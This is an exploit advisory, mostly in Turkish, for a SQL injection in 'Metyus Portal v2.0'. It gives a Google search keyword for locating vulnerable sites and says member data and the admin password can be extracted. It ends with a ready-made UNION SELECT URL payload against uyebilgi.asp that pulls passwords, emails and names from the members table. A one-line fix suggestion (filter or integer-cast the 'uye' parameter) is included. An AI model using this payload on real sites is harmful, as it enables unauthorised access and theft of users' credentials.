< ------------------- header data start ------------------- >

#############################################################

# Application Name : Metyus Portal v2.0

# Vulnerable Type : SQL Injnection

# Google Keyword : Metyus Portal v2.0

# Infection : Üye bilgilerine ve kullanici tablosundan Admin sifresine ulasilabilir.

# Bug Fix Advice : uyebilg.asp dosyasinda ’uye’ query degiskenine gerekli filtreleme yapilmalidir.
Yada ilgili degisken Cint(Request.Querystring(uye)) seklinde tanimlanmalidir.

# author : CyberGhost

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/uyebilgi.asp?uye=-1’+union+select+0,sifre,2,email,isim,id,6,7,8,9,0,1,2,3,4+from+uyeler

< -- bug code end of -- >